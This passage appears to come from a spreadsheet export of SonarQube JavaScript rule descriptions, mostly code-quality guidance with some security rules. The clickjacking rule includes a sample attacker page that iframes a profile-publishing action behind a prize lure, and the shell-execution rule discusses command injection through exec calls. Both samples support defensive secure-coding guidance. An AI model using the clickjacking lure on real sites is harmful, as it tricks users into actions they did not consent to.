str.replace("([", "{");
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1135</t>
  </si>
  <si>
    <t>Track uses of "TODO" tags</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;TODO&lt;/code&gt; tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.&lt;/p&gt;
&lt;p&gt;Sometimes the developer will not have the time or will simply forget to get back to that tag.&lt;/p&gt;
&lt;p&gt;This rule is meant to track those tags and to ensure that they do not go unnoticed.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function doSomething() {
  // TODO
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/546.html"&gt;MITRE, CWE-546&lt;/a&gt; - Suspicious Comment &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5732</t>
  </si>
  <si>
    <t>Disabling content security policy frame-ancestors directive is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://en.wikipedia.org/wiki/Clickjacking"&gt;Clickjacking&lt;/a&gt; attacks occur when an attacker try to trick an user to click on certain
buttons/links of a legit website. This attack can take place with malicious HTML frames well hidden in an attacker website.&lt;/p&gt;
&lt;p&gt;For instance, suppose a safe and authentic page of a social network (https://socialnetworkexample.com/makemyprofilpublic) which allows an user to
change the visibility of his profile by clicking on a button. This is a critical feature with high privacy concerns. Users are generally well informed
on the social network of the consequences of this action. An attacker can trick users, without their consent, to do this action with the below
embedded code added on a malicious website:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;html&amp;gt;
&amp;lt;b&amp;gt;Click on the button below to win 5000$&amp;lt;/b&amp;gt;
&amp;lt;br&amp;gt;
&amp;lt;iframe src="https://socialnetworkexample.com/makemyprofilpublic" width="200" height="200"&amp;gt;&amp;lt;/iframe&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/pre&gt;
&lt;p&gt;Playing with the size of the iframe itâ€™s sometimes possible to display only the critical parts of a page, in this case the button of the
&lt;em&gt;makemyprofilpublic&lt;/em&gt; page.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://en.wikipedia.org/wiki/Clickjacking#Clickjacking_categories"&gt;Critical actions&lt;/a&gt; of the application are prone to clickjacking
  attacks because a simple click on a link or a button can trigger them. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Implement content security policy &lt;em&gt;frame-ancestors&lt;/em&gt; directive which is supported by all modern browsers and will specify the origins of
frame allowed to be loaded by the browser (this directive deprecates &lt;a
href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options"&gt;X-Frame-Options&lt;/a&gt;).&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;In Express.js application the code is sensitive if the &lt;a href="https://www.npmjs.com/package/helmet-csp"&gt;helmet-csp&lt;/a&gt; or &lt;a
href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt; middleware is used without the &lt;code&gt;frameAncestors&lt;/code&gt; directive (or if
&lt;code&gt;frameAncestors&lt;/code&gt; is set to &lt;code&gt;'none'&lt;/code&gt;):&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(
  helmet.contentSecurityPolicy({
    directives: {
      // other directives
      frameAncestors: ["'none'"] // Sensitive: frameAncestors  is set to none
    }
  })
);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;In Express.js application a standard way to implement CSP frame-ancestors directive is the &lt;a
href="https://www.npmjs.com/package/helmet-csp"&gt;helmet-csp&lt;/a&gt; or &lt;a href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt; middleware:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(
  helmet.contentSecurityPolicy({
    directives: {
      // other directives
      frameAncestors: ["'example.com'"] // Compliant
    }
  })
);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A6-Security_Misconfiguration"&gt;OWASP Top 10 2017 Category A6&lt;/a&gt; -
  Security Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html"&gt;OWASP Cheat Sheets&lt;/a&gt; - Clickjacking Defense
  Cheat Sheet &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors"&gt;developer.mozilla.org&lt;/a&gt; -
  Frame-ancestors &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP"&gt;developer.mozilla.org&lt;/a&gt; - Content Security Policy (CSP) &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/451.html"&gt;MITRE, CWE-451&lt;/a&gt; - User Interface (UI) Misrepresentation of Critical Information
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.w3.org/TR/CSP3/"&gt;w3.org&lt;/a&gt; - Content Security Policy Level 3 &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S2589</t>
  </si>
  <si>
    <t>Boolean expressions should not be gratuitous</t>
  </si>
  <si>
    <t>&lt;p&gt;If a boolean expression doesnâ€™t change the evaluation of the condition, then it is entirely unnecessary, and can be removed. If it is gratuitous
because it does not match the programmerâ€™s intent, then itâ€™s a bug and the expression should be fixed.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (a) {
  if (a) { // Noncompliant
    doSomething();
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (a) {
  if (b) {
    doSomething();
  }
}
// or
if (a) {
  doSomething();
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/571"&gt;MITRE, CWE-571&lt;/a&gt; - Expression is Always True &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/570"&gt;MITRE, CWE-570&lt;/a&gt; - Expression is Always False &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S3798</t>
  </si>
  <si>
    <t>Variables and functions should not be declared in the global scope</t>
  </si>
  <si>
    <t>&lt;p&gt;Any variable or function declared in the global scope implicitly becomes attached to the global object (the &lt;code&gt;window&lt;/code&gt; object in a browser
environment). To make it explicit this variable or function should be a property of &lt;code&gt;window&lt;/code&gt;. When it is meant to be used just locally, it
should be declared with the &lt;code&gt;const&lt;/code&gt; or &lt;code&gt;let&lt;/code&gt; keywords (since ECMAScript 2015) or within an Immediately-Invoked Function
Expression (IIFE).&lt;/p&gt;
&lt;p&gt;This rule should not be activated when modules are used.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var myVar = 42;       // Noncompliant
function myFunc() { } // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
window.myVar = 42;
window.myFunc = function() { };
&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;
let myVar = 42;
let myFunc = function() { }
&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;
// IIFE
(function() {
  var myVar = 42;
  function myFunc() { }
})();
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4721</t>
  </si>
  <si>
    <t>Using shell interpreter when executing OS commands is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Arbitrary OS command injection vulnerabilities are more likely when a shell is spawned rather than a new process, indeed shell meta-chars can be
used (when parameters are user-controlled for instance) to inject OS commands.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; OS command name or parameters are user-controlled. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Use functions that donâ€™t spawn a shell.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
const cp = require('child_process');
// A shell will be spawn in these following cases:
cp.exec(cmd); // Sensitive
cp.execSync(cmd); // Sensitive
cp.spawn(cmd, { shell: true }); // Sensitive
cp.spawnSync(cmd, { shell: true }); // Sensitive
cp.execFile(cmd, { shell: true }); // Sensitive
cp.execFileSync(cmd, { shell: true }); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const cp = require('child_process');
cp.spawnSync("/usr/bin/file.exe", { shell: false }); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A1-Injection"&gt;OWASP Top 10 2017 Category A1&lt;/a&gt; - Injection &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/78"&gt;MITRE, CWE-78&lt;/a&gt; - Improper Neutralization of Special Elements used in an OS Command &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat1"&gt;SANS Top 25&lt;/a&gt; - Insecure Interaction Between Components &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4143</t>
  </si>
  <si>
    <t>Collection elements should not be replaced unconditionally</t>
  </si>
  <si>
    <t>&lt;p&gt;It is highly suspicious when a value is saved for a key or index and then unconditionally overwritten. Such replacements are likely in error.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
 fruits[1] = "banana";
 fruits[1] = "apple";  // Noncompliant - value on index 1 is overwritten
 myMap.set("key", 1);
 myMap.set("key", 2); // Noncompliant - value for key "key" is replaced
 mySet.add(1);
 mySet.add(1); // Noncompliant - element is already in the set
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3863</t>
  </si>
  <si>
    <t>Imports from the same modules should be merged</t>
  </si>
  <si>
    <t>&lt;p&gt;Multiple imports from the same module should be merged together to improve readability.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
import { B1 } from 'b';
import { B2 } from 'b'; // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
import { B1, B2 } from 'b';
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4144</t>
  </si>
  <si>
    <t>Functions should not have identical implementations</t>
  </si>
  <si>
    <t>&lt;p&gt;When two functions have the same implementation, either it was a mistake - something else was intended - or the duplication was intentional, but
may be confusing to maintainers. In the latter case, the code should be refactored.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function calculateCode() {
  doTheThing();
  doOtherThing();
  return code;
}
function getName() {  // Noncompliant
  doTheThing();
  doOtherThing();
  return code;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function calculateCode() {
  doTheThing();
  doOtherThing();
  return code;
}
function getName() {
  return calculateCode();
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Functions with fewer than 3 lines are ignored.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S2870</t>
  </si>
  <si>
    <t>"delete" should not be used on arrays</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;delete&lt;/code&gt; operator can be used to remove a property from any object. Arrays are objects, so the &lt;code&gt;delete&lt;/code&gt; operator can be
used here too, but if it is, a hole will be left in the array because the indexes/keys wonâ€™t be shifted to reflect the deletion.&lt;/p&gt;
&lt;p&gt;The proper method for removing an element at a certain index would be:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.splice&lt;/code&gt; - add/remove elements from the array &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.pop&lt;/code&gt; - add/remove elements from the end of the array &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.shift&lt;/code&gt; - add/remove elements from the beginning of the array &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var myArray = ['a', 'b', 'c', 'd'];
delete myArray[2];  // Noncompliant. myArray =&amp;gt; ['a', 'b', undefined, 'd']
console.log(myArray[2]); // expected value was 'd' but output is undefined
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var myArray = ['a', 'b', 'c', 'd'];
// removes 1 element from index 2
removed = myArray.splice(2, 1);  // myArray =&amp;gt; ['a', 'b', 'd']
console.log(myArray[2]); // outputs 'd'
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3001</t>
  </si>
  <si>
    <t>"delete" should be used only with object properties</t>
  </si>
  <si>
    <t>&lt;p&gt;The semantics of the &lt;code&gt;delete&lt;/code&gt; operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass
anything else to it, and you may or may not get the desired result.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var x  = 1;
delete x;       // Noncompliant
function foo(){
..
}
delete foo;  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var obj = {
  x:1,
  foo: function(){
  ...
  }
};
delete obj.x;
delete obj.foo;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2685</t>
  </si>
  <si>
    <t>"arguments.caller" and "arguments.callee" should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Both &lt;code&gt;arguments.caller&lt;/code&gt; and &lt;code&gt;arguments.callee&lt;/code&gt; make quite a few optimizations impossible so they were deprecated in latest
versions of JavaScript. In fact, EcmaScript 5 forbids the use of both in &lt;code&gt;strict&lt;/code&gt; mode, according to the docs:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Arguments objects for strict mode functions define non-configurable accessor properties named "caller" and "callee" which throw a TypeError
  exception on access.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The same restriction applies to the functionâ€™s &lt;code&gt;caller&lt;/code&gt; and &lt;code&gt;arguments&lt;/code&gt; properties in &lt;code&gt;strict&lt;/code&gt; mode.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function whoCalled() {
   if (arguments.caller == null)   //Noncompliant
      console.log('I was called from the global scope.');
   else
      console.log(arguments.caller + ' called me!');  // Noncompliant
  console.log(whoCalled.caller);  // Noncompliant
  console.log(whoCalled.arguments);  // Noncompliant
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2999</t>
  </si>
  <si>
    <t>"new" operators should be used with functions</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;new&lt;/code&gt; keyword should only be used with objects that define a constructor function. Use it with anything else, and youâ€™ll get a
&lt;code&gt;TypeError&lt;/code&gt; because there wonâ€™t be a constructor function for the &lt;code&gt;new&lt;/code&gt; keyword to invoke.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function MyClass() {
  this.foo = 'bar';
}
var someClass = 1;
var obj1 = new someClass;    // Noncompliant;
var obj2 = new MyClass();    // Noncompliant if considerJSDoc parameter set to true. Compliant when considerJSDoc=false
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
/**
 * @constructor
 */
function MyClass() {
  this.foo = 'bar';
}
var someClass = function(){
  this.prop = 1;
}
var obj1 = new someClass;  // Compliant
var obj2 = new MyClass();  // Compliant regardless of considerJSDoc value
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3735</t>
  </si>
  <si>
    <t>"void" should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;void&lt;/code&gt; operator evaluates its argument and unconditionally returns &lt;code&gt;undefined&lt;/code&gt;. It can be useful in pre-ECMAScript 5
environments, where &lt;code&gt;undefined&lt;/code&gt; could be reassigned, but generally, its use makes code harder to understand.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
void doSomething();
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
doSomething();
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;No issue is raised when &lt;code&gt;void 0&lt;/code&gt; is used in place of &lt;code&gt;undefined&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;
if (parameter === void 0) {...}
&lt;/pre&gt;
&lt;p&gt;No issue is also raised when &lt;code&gt;void&lt;/code&gt; is used before immediately invoked function expressions.&lt;/p&gt;
&lt;pre&gt;
void (function() {
   ...
}());
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2138</t>
  </si>
  <si>
    <t>"undefined" should not be assigned</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;undefined&lt;/code&gt; is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing
variable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. Instead,
&lt;code&gt;null&lt;/code&gt; should be used, allowing you to tell the difference between a property that has been reset and one that was never created.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var myObject = {};
// ...
myObject.fname = undefined;  // Noncompliant
// ...
if (myObject.lname == undefined) {
  // property not yet created
}
if (myObject.fname == undefined) {
  // no real way of knowing the true state of myObject.fname
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var myObject = {};
// ...
myObject.fname = null;
// ...
if (myObject.lname == undefined) {
  // property not yet created
}
if (myObject.fname == undefined) {
  // no real way of knowing the true state of myObject.fname
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3834</t>
  </si>
  <si>
    <t>"Symbol" should not be used as a constructor</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;Symbol&lt;/code&gt; is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.&lt;/p&gt;
&lt;p&gt;An instance can only be created by using &lt;code&gt;Symbol&lt;/code&gt; as a function. Using &lt;code&gt;Symbol&lt;/code&gt; with the &lt;code&gt;new&lt;/code&gt; operator will raise
a &lt;code&gt;TypeError&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const sym = new Symbol("foo");   // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const sym = Symbol("foo");
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3973</t>
  </si>
  <si>
    <t>A conditionally executed single line should be denoted by indentation</t>
  </si>
  <si>
    <t>&lt;p&gt;In the absence of enclosing curly braces, the line immediately after a conditional is the one that is conditionally executed. By both convention
and good practice, such lines are indented. In the absence of both curly braces and indentation the intent of the original programmer is entirely
unclear and perhaps not actually what is executed. Additionally, such code is highly likely to be confusing to maintainers.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (condition)  // Noncompliant
doTheThing();
doTheOtherThing();
somethingElseEntirely();
foo();
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (condition)
  doTheThing();
doTheOtherThing();
somethingElseEntirely();
foo();
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3757</t>
  </si>
  <si>
    <t>Arithmetic operations should not result in "NaN"</t>
  </si>
  <si>
    <t>&lt;p&gt;The result of an expression with an arithmetic operator &lt;code&gt;/, *, %, ++, --, -, +=, -=, *=, /=, %=, +&lt;/code&gt; or unary operator &lt;code&gt;+, -&lt;/code&gt;
when at least one operand is &lt;code&gt;Object&lt;/code&gt; or &lt;code&gt;Undefined&lt;/code&gt; will be always a &lt;code&gt;NaN&lt;/code&gt; (Not a Number).&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
x = [1, 2];
var y = x / 4;  //Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;code&gt;Date&lt;/code&gt; operands: they are implicitly converted to numbers. &lt;/li&gt;
  &lt;li&gt; The binary &lt;code&gt;+&lt;/code&gt; operator with &lt;code&gt;Object&lt;/code&gt; operand (concatenation). &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S2424</t>
  </si>
  <si>
    <t>Built-in objects should not be overridden</t>
  </si>
  <si>
    <t>&lt;p&gt;Overriding an object changes its behavior and could potentially impact all code using that object. Overriding standard, built-in objects could
therefore have broad, potentially catastrophic effects on previously-working code.&lt;/p&gt;
&lt;p&gt;This rule detects overrides of the following native objects:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,
  URIError &lt;/li&gt;
  &lt;li&gt; Numbers and dates - Number, Math, Date &lt;/li&gt;
  &lt;li&gt; Text processing - String, RegExp &lt;/li&gt;
  &lt;li&gt; Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Unit16Array, Int32Array, Uint32Array, Float32Array,
  Float64Array &lt;/li&gt;
  &lt;li&gt; Keyed collections - Map, Set, WeakMap, WeakSet &lt;/li&gt;
  &lt;li&gt; Structured data - ArrayBuffer, DataView, JSON &lt;/li&gt;
  &lt;li&gt; Control abstraction objects - Promise &lt;/li&gt;
  &lt;li&gt; Reflection - Reflect, Proxy &lt;/li&gt;
  &lt;li&gt; Internationalization - Intl &lt;/li&gt;
  &lt;li&gt; Non-standard objects - Generator, Iterator, ParallelArray, StopIteration &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4030</t>
  </si>
  <si>
    <t>Collection and array contents should be used</t>
  </si>
  <si>
    <t>&lt;p&gt;When a collection is populated but its contents are never used, then it is surely some kind of mistake. Either refactoring has rendered the
collection moot, or an access is missing.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when no methods are called on a collection other than those that add or remove values.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function getLength(a, b, c) {
  const strings = [];  // Noncompliant
  strings.push(a);
  strings.push(b);
  strings.push(c);
  return a.length + b.length + c.length;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function getLength(a, b, c) {
  return a.length + b.length + c.length;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2310</t>
  </si>
  <si>
    <t>Loop counters should not be assigned to from within the loop body</t>
  </si>
  <si>
    <t>&lt;p&gt;Loop counters should not be modified in the body of the loop. However other loop control variables representing logical values may be modified in
the loop, for example a flag to indicate that something has been completed, which is then tested in the for statement.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var names = [ "Jack", "Jim", "", "John" ];
for (var i = 0; i &amp;lt; names.length; i++) {
  if (!names[i]) {
    i = names.length;                                 // Non-Compliant
  } else {
    console.log(names[i]);
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var names = [ "Jack", "Jim", "", "John" ];
for (var name of names) {
  if (!name) {
    break;                                 // Compliant
  } else {
    console.log(name);
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3003</t>
  </si>
  <si>
    <t>Comparison operators should not be used with strings</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of comparison operators (&lt;code&gt;&amp;lt;&lt;/code&gt;, &lt;code&gt;&amp;lt;=&lt;/code&gt;, &lt;code&gt;&amp;gt;=&lt;/code&gt;, &lt;code&gt;&amp;gt;&lt;/code&gt;) with strings is not likely to yield
the expected results. Make sure the intention was to compare strings and not numbers.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var appleNumber = "123";
var orangeNumber = "45";
if (appleNumber &amp;lt; orangeNumber) {  // Noncompliant, this condition is true
  alert("There are more oranges");
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var appleNumber = "123";
var orangeNumber = "45";
if (Number(appleNumber) &amp;lt; Number(orangeNumber)) {
  alert("There are more oranges");
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;The rule ignores string comparisons occurring in the callback of a sort invocation, e.g.:&lt;/p&gt;
&lt;pre&gt;
const fruits = ['orange', 'apple', 'banana'];
fruits.sort((a, b) =&amp;gt; a &amp;lt; b);
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3800</t>
  </si>
  <si>
    <t>Functions should always return the same type</t>
  </si>
  <si>
    <t>&lt;p&gt;Unlike strongly typed languages, JavaScript does not enforce a return type on a function. This means that different paths through a function can
return different types of values, which can be very confusing to the user and significantly harder to maintain.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function foo(a) {  // Noncompliant
  if (a === 1) {
    return true;
  }
  return 3;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function foo(a) {
  if (a === 1) {
    return true;
  }
  return false;
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Functions returning &lt;code&gt;this&lt;/code&gt; are ignored.&lt;/p&gt;
&lt;pre&gt;
function foo() {
  // ...
  return this;
}
&lt;/pre&gt;
&lt;p&gt;Functions returning expressions having type &lt;code&gt;any&lt;/code&gt; are ignored.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1862</t>
  </si>
  <si>
    <t>Related "if/else if" statements should not have the same condition</t>
  </si>
  <si>
    <t>&lt;p&gt;A chain of &lt;code&gt;if&lt;/code&gt;/&lt;code&gt;else if&lt;/code&gt; statements is evaluated from top to bottom. At most, only one branch will be executed: the first
one with a condition that evaluates to &lt;code&gt;true&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy/paste error. At best, itâ€™s simply dead code and
at worst, itâ€™s a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Note that this rule requires Node.js to be available during analysis.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (param == 1)
  openWindow();
else if (param == 2)
  closeWindow();
else if (param == 1)  // Noncompliant
  moveWindowToTheBackground();
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (param == 1)
  openWindow();
else if (param == 2)
  closeWindow();
else if (param == 3)
  moveWindowToTheBackground();
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3981</t>
  </si>
  <si>
    <t>Collection sizes and array length comparisons should make sense</t>
  </si>
  <si>
    <t>&lt;p&gt;The size of a collection and the length of an array are always greater than or equal to zero. So testing that a size or length is greater than or
equal to zero doesnâ€™t make sense, since the result is always &lt;code&gt;true&lt;/code&gt;. Similarly testing that it is less than zero will always return
&lt;code&gt;false&lt;/code&gt;. Perhaps the intent was to check the non-emptiness of the collection or array instead.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (someSet.size &amp;gt;= 0) {...} // Noncompliant
if (someMap.size &amp;lt; 0) {...} // Noncompliant
const result = someArray.length &amp;gt;= 0;  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (someSet.size &amp;gt; 0) {...}
if (someMap.size == 0) {...}
const result = someArray.length &amp;gt; 0;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3579</t>
  </si>
  <si>
    <t>Array indexes should be numeric</t>
  </si>
  <si>
    <t>&lt;p&gt;Associative arrays allow you to store values in an array with either numeric or named indexes. But creating and populating an object is just as
easy as an array, and more reliable if you need named members.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let arr = [];
arr[0] = 'a';
arr['name'] = 'bob';  // Noncompliant
arr[1] = 'foo';
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let obj = {
  name: 'bob',
  arr: ['a', 'foo']
};
&lt;/pre&gt;</t>
